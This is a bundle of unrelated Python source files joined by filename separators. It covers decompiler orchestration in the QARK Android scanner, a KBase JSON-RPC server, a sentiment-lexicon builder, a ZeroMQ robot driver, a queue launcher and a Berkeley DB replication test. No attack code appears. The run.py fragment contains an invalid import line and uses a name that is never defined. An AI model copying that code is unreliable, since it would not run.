zf = zipfile.ZipFile(common.pathToJar)
# Total number of class files that need to be decompiled
total_files = len(zf.namelist())
report.write("totalfiles", total_files)
common.count = len([s for s in zf.namelist() if ((".class" in s) and ("$" not in s))])
pub.subscribe(decompiler_update, 'decompile')
thread0 = Process(name='clear', target=clear, args=())
thread1 = Process(name='jdcore', target=jdcore, args=(zf.filename, dirname))
thread2 = Process(name='procyon', target=cfr, args=(zf.filename, dirname))
thread3 = Process(name='cfr', target=procyon, args=(zf.filename, dirname))
thread0.start()
thread0.join()
progressbar1.start()
progressbar2.start()
progressbar3.start()
thread1.start()
thread2.start()
thread3.start()
thread1.join(0)
thread2.join(0)
thread3.join(0)
with common.term.cbreak():
val = None
while val not in (u'c', u'C'):
with common.term.location(0, common.term.height - 3):
print "Decompilation may hang/take too long (usually happens when the source is obfuscated)."
print "At any time," + common.term.bold_underline_red_on_white(
'Press C to continue') + " and QARK will attempt to run SCA on whatever was decompiled."
val = common.term.inkey(timeout=1)
if not (thread1.is_alive() or thread2.is_alive() or thread3.is_alive()):
break
if thread1.is_alive():
thread1.terminate()
if thread2.is_alive():
thread2.terminate()
if thread3.is_alive():
thread3.terminate()
# Go back to the bottom of the screen
with common.term.location(0, common.term.height):
print ""
g1 = grep_1(dirname, "// Byte code:")
g2 = grep_1(dirname + "1", "// This method has failed to decompile.")
g3 = grep_1(dirname + "2", "// This method could not be decompiled.")
# print list(set(g1) - set(g2))
logger.info("Trying to improve accuracy of the decompiled files")
restored = 0
try:
for filename in g1:
relative_filename = str(filename).split(dirname)[1]
if any(relative_filename in s for s in g2):
if any(relative_filename in s for s in g3):
logger.debug("Failed to reconstruct: " + relative_filename)
else:
shutil.copy(dirname + "2" + relative_filename, filename)
restored = restored + 1
else:
shutil.copy(dirname + "1" + relative_filename, filename)
restored = restored + 1
except Exception as e:
print e.message
report.write("restorestats", "Restored " + str(restored) + " file(s) out of " + str(len(g1)) + " corrupt file(s)")
logger.info("Restored " + str(restored) + " file(s) out of " + str(len(g1)) + " corrupt file(s)")
logger.debug("Deleting redundant decompiled files")
try:
shutil.rmtree(dirname + "1")
logger.debug("Deleted " + dirname + "1")
shutil.rmtree(dirname + "2")
logger.debug("Deleted " + dirname + "2")
except Exception as e:
logger.debug("Unable to delete redundant decompiled files (no impact on scan results): " + str(e))
def decompiler_update(cfr=None, jdcore=None, procyon=None):
lock.acquire()
if cfr is not None:
if cfr <= 100:
progressbar3.update(cfr)
if jdcore is not None:
if jdcore <= 100:
progressbar1.update(jdcore)
if procyon is not None:
if procyon <= 100:
progressbar2.update(procyon)
lock.release()
def jdcore(path, dirname):
"""
calls the jdcore decompiler from command line
"""
process = subprocess.Popen(["java", "-jar", common.rootDir + "/lib/jd-core-java-1.2.jar", path, dirname],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def cfr(path, dirname):
"""
calls the cfr decompiler from command line
"""
process = subprocess.Popen(
["java", "-jar", common.rootDir + "/lib/cfr_0_115.jar", path, "--outputdir", dirname + "1"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
try:
while True:
line = process.stdout.readline()
if not line:
break
if "Processing" in line:
common.counter1 = common.counter1 + 1
pub.sendMessage('decompile', cfr=round(common.counter1 * 100 / common.count))
pub.sendMessage('decompile', jdcore=round(common.counter1 * 100 / common.count))
except Exception as e:
logger.debug(e.message)
def procyon(path, dirname):
"""
calls the procyon decompiler from command line
"""
process = subprocess.Popen(
["java", "-jar", common.rootDir + "/lib/procyon/procyon-decompiler-0.5.30.jar", path, "-o ", dirname + "2"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
try:
while True:
line = process.stdout.readline()
if not line:
break
if "Decompiling" in line:
common.counter2 = common.counter2 + 1
pub.sendMessage('decompile', procyon=round(common.counter2 * 100 / common.count))
except Exception as e:
logger.debug(e.message)
def clear():
"""
Making space for progressbars
"""
with common.term.location():
logger.info(
'Please wait while QARK tries to decompile the code back to source using multiple decompilers. This may take a while.')
print("\n" * 11)
|
submoduletestServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from submoduletest.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-server-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'submoduletest'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from submoduletest.submoduletestImpl import submoduletest # noqa @IgnorePep8
impl_submoduletest = submoduletest(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.message
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'submoduletest'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_submoduletest.foo,
name='submoduletest.foo',
types=[int])
self.method_authentication['submoduletest.foo'] = 'required' # noqa
self.rpc_service.add(impl_submoduletest.status,
name='submoduletest.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'submoduletest ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
make_adj_lexicons.py
|
import time
import random
import constants
import seeds
from socialsent import util
from socialsent import polarity_induction_methods
from socialsent.historical import vocab
from multiprocessing import Queue, Process
from Queue import Empty
from socialsent.representations.representation_factory import create_representation
"""
Makes historical sentiment lexicons for all adjectives.
(Only adjectives that occurred > 500 times are contained within the embeddings).
"""
def worker(proc_num, queue):
while True:
time.sleep(random.random()*10)
try:
year = queue.get(block=False)
except Empty:
print proc_num, "Finished"
return
positive_seeds, negative_seeds = seeds.adj_seeds()
year = str(year)
print proc_num, "On year", year
words = vocab.pos_words(year, "jj")
embed = create_representation("SVD", constants.COHA_EMBEDDINGS + year)
embed_words = set(embed.iw)
words = words.intersection(embed_words)
polarities = polarity_induction_methods.bootstrap(
embed.get_subembed(words.union(positive_seeds).union(negative_seeds)),
positive_seeds, negative_seeds,
score_method=polarity_induction_methods.random_walk,
num_boots=50, n_procs=20, return_all=True,
beta=0.9, nn=25)
util.write_pickle(polarities, constants.POLARITIES + year + '-coha-adj-boot.pkl')
def main():
num_procs = 6
queue = Queue()
for year in range(1850, 2010, 10):
queue.put(year)
procs = [Process(target=worker, args=[i, queue]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == "__main__":
main()
|
Driver_socket.py
|
#
# Created on Wed Sep 22 2021
# Author: Owen Yip
# Mail: me@owenyip.com
#
# Socket number:
# RpLidar is 5450, IMU is 5451, Driver is 5452
#
import numpy as np
import os,sys
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import time
import threading
import zmq
import json
from Driver import ControlOdometryDriver as cd
# from Network import FrontFollowingNetwork as FFL
CD = cd.ControlDriver(record_mode=False, left_right=0)
thread_cd = threading.Thread(target=CD.control_part, args=())
def send_control(control = None):
CD.speed = control['speed']
CD.radius = control['radius']
CD.omega = control['omega']
init_control = {
"speed": 0,
"radius": 0,
"omega": 0
}
send_control(init_control)
thread_cd.start()
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect("tcp://127.0.0.1:5454")
topicfilter = "DRIVER_RECV"
socket.setsockopt_string(zmq.SUBSCRIBE, topicfilter)
while True:
# Wait for next request from client
message = socket.recv_string()
if message:
message = message.replace(topicfilter, "")
control = json.loads(message)
if len(control) > 0:
send_control(control)
print("Received request: %s" % control)
# Do some 'work'
time.sleep(0)
# Send reply back to client
# socket.send(b"World")
|
run.py
|
import argparse
from threading import Thread, Event
from app.acceptor import app
from app.rest_api import api, configure_rest_api
from app.acceptor_configuration.configuration_factory import shared.configurationFactory
from app.controllers.implementations.MessageHolder import MessageHolder
from app.controllers.implementations.Mediator import Mediator
from controllers.implementations.ErrorQueuePusher import ErrorQueuePusher
from controllers.implementations.ProcessorQueuePusher import ProcessorQueuePusher
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--environment', type=str, help="docker/dev", required=True)
return parser.parse_args()
if __name__ == '__main__':
event = Event()
message_holder = MessageHolder(event)
args = parse_args()
configuration = ConfigurationFactory.createConfiguration(args.environment)
configure_rest_api(api, configuration, message_holder)
_kwargs = {'host': configuration.host,
'port': configuration.port,
'debug': configuration.debug,
'use_debugger': configuration.use_debugger,
'use_reloader': configuration.use_reloader}
app_thread = Thread(target=app.run, name='app_thread', kwargs=_kwargs)
processor_queue_pusher = ProcessorQueuePusher(queue_server=configuration.queueServer,
queue_port=configuration.queuePort,
queue_name=configuration.processorQueueName)
error_queue_pusher = ErrorQueuePusher(queue_server=configuration.queueServer, queue_port=configuration.queuePort,
queue_name=configuration.errorsQueueName)
mediator = Mediator(event, message_holder, processor_queue_pusher, error_queue_pusher)
mediator_thread = Thread(target=mediator.start, name='mediator_thread')
#app_thread.run()
mediator_thread.start() # todo: understand is run() -correct choise or start() should be used
app_thread.run()
# app.run(
# host=acceptor_configuration.host,
# port=acceptor_configuration.port,
# debug=acceptor_configuration.debug,
# use_debugger=acceptor_configuration.use_debugger,
# use_reloader=acceptor_configuration.use_reloader)
# message_holder = MessageHolder()
# mediator = Mediator()
print('end')
|
test_replication.py
|
"""TestCases for distributed transactions.
"""
import os
import time
import unittest
from test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplication(unittest.TestCase) :
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
# Here we assign dummy event handlers to allow GC of the test object.
# Since the dummy handler doesn't use any outer scope variable, it
# doesn't keep any reference to the test object.
def dummy(*args) :
pass
self.dbenvMaster.set_event_notify(dummy)
self.dbenvClient.set_event_notify(dummy)
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
class DBReplicationManager(DBReplication) :
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
client_port = test_support.find_unused_port()
if db.version() >= (5, 2) :
self.site = self.dbenvMaster.repmgr_site("127.0.0.1", master_port)
self.site.set_config(db.DB_GROUP_CREATOR, True)
self.site.set_config(db.DB_LOCAL_SITE, True)
self.site2 = self.dbenvMaster.repmgr_site("127.0.0.1", client_port)
self.site3 = self.dbenvClient.repmgr_site("127.0.0.1", master_port)
self.site3.set_config(db.DB_BOOTSTRAP_HELPER, True)
self.site4 = self.dbenvClient.repmgr_site("127.0.0.1", client_port)
self.site4.set_config(db.DB_LOCAL_SITE, True)
d = {
db.DB_BOOTSTRAP_HELPER: [False, False, True, False],
db.DB_GROUP_CREATOR: [True, False, False, False],
db.DB_LEGACY: [False, False, False, False],
db.DB_LOCAL_SITE: [True, False, False, True],
db.DB_REPMGR_PEER: [False, False, False, False ],
}
for i, j in d.items() :
for k, v in \
zip([self.site, self.site2, self.site3, self.site4], j) :
if v :
self.assertTrue(k.get_config(i))
else :
self.assertFalse(k.get_config(i))
self.assertNotEqual(self.site.get_eid(), self.site2.get_eid())
self.assertNotEqual(self.site3.get_eid(), self.site4.get_eid())
for i, j in zip([self.site, self.site2, self.site3, self.site4], \
[master_port, client_port, master_port, client_port]) :
addr = i.get_address()
self.assertEqual(addr, ("127.0.0.1", j))
for i in [self.site, self.site2] :
self.assertEqual(i.get_address(),
self.dbenvMaster.repmgr_site_by_eid(i.get_eid()).get_address())
for i in [self.site3, self.site4] :
self.assertEqual(i.get_address(),
self.dbenvClient.repmgr_site_by_eid(i.get_eid()).get_address())
else :
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEqual(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEqual(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEqual(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEqual(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEqual(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEqual(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER);
self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT);
self.assertEqual(self.dbenvMaster.rep_get_nsites(),2)
self.assertEqual(self.dbenvClient.rep_get_nsites(),2)
self.assertEqual(self.dbenvMaster.rep_get_priority(),10)
self.assertEqual(self.dbenvClient.rep_get_priority(),0)
self.assertEqual(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEqual(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+60
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
# self.client_startupdone does not always get set to True within
# the timeout. On windows this may be a deep issue, on other
# platforms it is likely just a timing issue, especially on slow
# virthost buildbots (see issue 3892 for more). Even though
# the timeout triggers, the rest of this test method usually passes
# (but not all of it always, see below). So we just note the
# timeout on stderr and keep soldering on.
if time.time()>timeout:
import sys
print >> sys.stderr, ("XXX: timeout happened before"
"startup was confirmed - see issue 3892")
startup_timeout = True
d = self.dbenvMaster.repmgr_site_list()
self.assertEqual(len(d), 1)
d = d.values()[0] # There is only one
self.assertEqual(d[0], "127.0.0.1")
self.assertEqual(d[1], client_port)
self.assertTrue((d[2]==db.DB_REPMGR_CONNECTED) or \
(d[2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEqual(len(d), 1)
d = d.values()[0] # There is only one
self.assertEqual(d[0], "127.0.0.1")
self.assertEqual(d[1], master_port)
self.assertTrue((d[2]==db.DB_REPMGR_CONNECTED) or \
(d[2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
